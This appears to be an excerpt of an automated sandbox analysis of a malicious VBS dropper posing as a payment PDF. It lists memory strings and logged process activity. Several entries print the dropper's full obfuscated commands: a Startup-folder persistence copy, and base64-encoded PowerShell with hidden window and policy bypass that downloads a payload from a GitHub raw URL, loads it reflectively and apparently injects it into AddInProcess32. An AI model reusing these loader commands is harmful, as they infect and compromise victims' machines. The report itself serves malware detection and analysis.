                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2377012915.00007FF848800000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.2331620773.000002001101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2368362853.000002006DC40000.00000004.08000000.00040000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IHost.FullName();IWshShell3.CurrentDirectory();IHost.ScriptName();IWshShell3.SpecialFolders("Startup");IFileSystem3.FileExists("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\expansibilidade.vbs");IFileSystem3.CopyFile("C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs", "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\expansibilidade.vbs");IWshShell3.Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IWshShell3.Run("powershell -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJyc", "0", "false")
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2VudCk7JysnIFtkbmxpYi5JTy5IJysnb21lXTo6VkFJKGVXJysnQTAvSlU0YmYvZC9lZScrJy4nKydldHNhcC8vOnNwdHQnKydoZVdBLCAnKydlJysnV0FkJysnZXNhdGl2YWRvZScrJ1dBLCBlV0FkZXNhdGknKyd2YWQnKydvZVdBLCBlJysnV0FkZXNhdCcrJ2l2YWRvZVdBLCBlJysnV0FBZCcrJ2RJblByb2Nlc3MzJysnMmVXQSwgZScrJ1cnKydBZVdBLGVXQWUnKydXQSknKS5yRXBsYWNFKChbY0hBcl0xMDErW2NIQXJdODcrW2NIQXJdNjUpLFtzVHJJbmddW2NIQXJdMzQpLnJFcGxhY0UoJ1NIcycsW3NUckluZ11bY0hBcl0zNikuckVwbGFjRSgoW2NIQXJdNTErW2NIQXJdMTAwK1tjSEFyXTc1KSxbc1RySW5nXVtjSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $EnV:cOmSPec[4,15,25]-JOIN'')( ('SHsurl '+'='+' 3dKht'+'t'+'ps:'+'//'+'ra'+'w.gith'+'ubuse'+'rcontent.com/NoD'+'et'+'ectOn/NoDe'+'tectOn/refs/heads/main/Det'+'ahNoth-V.'+'t'+'x'+'t3dK'+'; '+'SHs'+'base64Conte'+'nt = '+'(New-O'+'bje'+'ct'+' '+'S'+'yste'+'m.Ne'+'t.WebClient).Do'+'wnloadString(SHsurl'+'); '+'SHsbinary'+'Cont'+'ent = [System.Convert]::From'+'Ba'+'se64St'+'ring(SHs'+'base6'+'4'+'Content);'+' SHsassemb'+'ly = [R'+'eflec'+'tion.Assembly]::'+'Load(SHs'+'b'+'ina'+'ryCont'+'ent);'+' [dnlib.IO.H'+'ome]::VAI(eW'+'A0/JU4bf/d/ee'+'.'+'etsap//:sptt'+'heWA, '+'e'+'WAd'+'esativadoe'+'WA, eWAdesati'+'vad'+'oeWA, e'+'WAdesat'+'ivadoeWA, e'+'WAAd'+'dInProcess3'+'2eWA, e'+'W'+'AeWA,eWAe'+'WA)').rEplacE(([cHAr]101+[cHAr]87+[cHAr]65),[sTrIng][cHAr]34).rEplacE('SHs',[sTrIng][cHAr]36).rEplacE(([cHAr]51+[cHAr]100+[cHAr]75),[sTrIng][cHAr]39) )"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $EnV:cOmSPec[4,15,25]-JOIN'')( ('SHsurl '+'='+' 3dKht'+'t'+'ps:'+'//'+'ra'+'w.gith'+'ubuse'+'rcontent.com/NoD'+'et'+'ectOn/NoDe'+'tectOn/refs/heads/main/Det'+'ahNoth-V.'+'t'+'x'+'t3dK'+'; '+'SHs'+'base64Conte'+'nt = '+'(New-O'+'bje'+'ct'+' '+'S'+'yste'+'m.Ne'+'t.WebClient).Do'+'wnloadString(SHsurl'+'); '+'SHsbinary'+'Cont'+'ent = [System.Convert]::From'+'Ba'+'se64St'+'ring(SHs'+'base6'+'4'+'Content);'+' SHsassemb'+'ly = [R'+'eflec'+'tion.Assembly]::'+'Load(SHs'+'b'+'ina'+'ryCont'+'ent);'+' [dnlib.IO.H'+'ome]::VAI(eW'+'A0/JU4bf/d/ee'+'.'+'etsap//:sptt'+'heWA, '+'e'+'WAd'+'esativadoe'+'WA, eWAdesati'+'vad'+'oeWA, e'+'WAdesat'+'ivadoeWA, e'+'WAAd'+'dInProcess3'+'2eWA, e'+'W'+'AeWA,eWAe'+'WA)').rEplacE(([cHAr]101+[cHAr]87+[cHAr]65),[sTrIng][cHAr]34).rEplacE('SHs',[sTrIng][cHAr]36).rEplacE(([cHAr]51+[cHAr]100+[cHAr]75),[sTrIng][cHAr]39) )"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2VudCk7JysnIFtkbmxpYi5JTy5IJysnb21lXTo6VkFJKGVXJysnQTAvSlU0YmYvZC9lZScrJy4nKydldHNhcC8vOnNwdHQnKydoZVdBLCAnKydlJysnV0FkJysnZXNhdGl2YWRvZScrJ1dBLCBlV0FkZXNhdGknKyd2YWQnKydvZVdBLCBlJysnV0FkZXNhdCcrJ2l2YWRvZVdBLCBlJysnV0FBZCcrJ2RJblByb2Nlc3MzJysnMmVXQSwgZScrJ1cnKydBZVdBLGVXQWUnKydXQSknKS5yRXBsYWNFKChbY0hBcl0xMDErW2NIQXJdODcrW2NIQXJdNjUpLFtzVHJJbmddW2NIQXJdMzQpLnJFcGxhY0UoJ1NIcycsW3NUckluZ11bY0hBcl0zNikuckVwbGFjRSgoW2NIQXJdNTErW2NIQXJdMTAwK1tjSEFyXTc1KSxbc1RySW5nXVtjSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $EnV:cOmSPec[4,15,25]-JOIN'')( ('SHsurl '+'='+' 3dKht'+'t'+'ps:'+'//'+'ra'+'w.gith'+'ubuse'+'rcontent.com/NoD'+'et'+'ectOn/NoDe'+'tectOn/refs/heads/main/Det'+'ahNoth-V.'+'t'+'x'+'t3dK'+'; '+'SHs'+'base64Conte'+'nt = '+'(New-O'+'bje'+'ct'+' '+'S'+'yste'+'m.Ne'+'t.WebClient).Do'+'wnloadString(SHsurl'+'); '+'SHsbinary'+'Cont'+'ent = [System.Convert]::From'+'Ba'+'se64St'+'ring(SHs'+'base6'+'4'+'Content);'+' SHsassemb'+'ly = [R'+'eflec'+'tion.Assembly]::'+'Load(SHs'+'b'+'ina'+'ryCont'+'ent);'+' [dnlib.IO.H'+'ome]::VAI(eW'+'A0/JU4bf/d/ee'+'.'+'etsap//:sptt'+'heWA, '+'e'+'WAd'+'esativadoe'+'WA, eWAdesati'+'vad'+'oeWA, e'+'WAdesat'+'ivadoeWA, e'+'WAAd'+'dInProcess3'+'2eWA, e'+'W'+'AeWA,eWAe'+'WA)').rEplacE(([cHAr]101+[cHAr]87+[cHAr]65),[sTrIng][cHAr]34).rEplacE('SHs',[sTrIng][cHAr]36).rEplacE(([cHAr]51+[cHAr]100+[cHAr]75),[sTrIng][cHAr]39) )"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2VudCk7JysnIFtkbmxpYi5JTy5IJysnb21lXTo6VkFJKGVXJysnQTAvSlU0YmYvZC9lZScrJy4nKydldHNhcC8vOnNwdHQnKydoZVdBLCAnKydlJysnV0FkJysnZXNhdGl2YWRvZScrJ1dBLCBlV0FkZXNhdGknKyd2YWQnKydvZVdBLCBlJysnV0FkZXNhdCcrJ2l2YWRvZVdBLCBlJysnV0FBZCcrJ2RJblByb2Nlc3MzJysnMmVXQSwgZScrJ1cnKydBZVdBLGVXQWUnKydXQSknKS5yRXBsYWNFKChbY0hBcl0xMDErW2NIQXJdODcrW2NIQXJdNjUpLFtzVHJJbmddW2NIQXJdMzQpLnJFcGxhY0UoJ1NIcycsW3NUckluZ11bY0hBcl0zNikuckVwbGFjRSgoW2NIQXJdNTErW2NIQXJdMTAwK1tjSEFyXTc1KSxbc1RySW5nXVtjSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $EnV:cOmSPec[4,15,25]-JOIN'')( ('SHsurl '+'='+' 3dKht'+'t'+'ps:'+'//'+'ra'+'w.gith'+'ubuse'+'rcontent.com/NoD'+'et'+'ectOn/NoDe'+'tectOn/refs/heads/main/Det'+'ahNoth-V.'+'t'+'x'+'t3dK'+'; '+'SHs'+'base64Conte'+'nt = '+'(New-O'+'bje'+'ct'+' '+'S'+'yste'+'m.Ne'+'t.WebClient).Do'+'wnloadString(SHsurl'+'); '+'SHsbinary'+'Cont'+'ent = [System.Convert]::From'+'Ba'+'se64St'+'ring(SHs'+'base6'+'4'+'Content);'+' SHsassemb'+'ly = [R'+'eflec'+'tion.Assembly]::'+'Load(SHs'+'b'+'ina'+'ryCont'+'ent);'+' [dnlib.IO.H'+'ome]::VAI(eW'+'A0/JU4bf/d/ee'+'.'+'etsap//:sptt'+'heWA, '+'e'+'WAd'+'esativadoe'+'WA, eWAdesati'+'vad'+'oeWA, e'+'WAdesat'+'ivadoeWA, e'+'WAAd'+'dInProcess3'+'2eWA, e'+'W'+'AeWA,eWAe'+'WA)').rEplacE(([cHAr]101+[cHAr]87+[cHAr]65),[sTrIng][cHAr]34).rEplacE('SHs',[sTrIng][cHAr]36).rEplacE(([cHAr]51+[cHAr]100+[cHAr]75),[sTrIng][cHAr]39) )"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041A8DA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF8485B5247 push esp; retf 5_2_00007FF8485B5248
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF8485C2325 push eax; iretd 6_2_00007FF8485C233D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF8485C7967 push ebx; retf 8_2_00007FF8485C796A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF8485C85B6 push esp; iretd 8_2_00007FF8485C85BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004000D8 push es; iretd 11_2_004000D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0040008C push es; iretd 11_2_0040008D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004542E6 push ecx; ret 11_2_004542F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0045B4FD push esi; ret 11_2_0045B506
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00432BD6 push ecx; ret 11_2_00432BE9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00454C08 push eax; ret 11_2_00454C26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_004063C6 ShellExecuteW,URLDownloadToFileW,11_2_004063C6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_00418A00
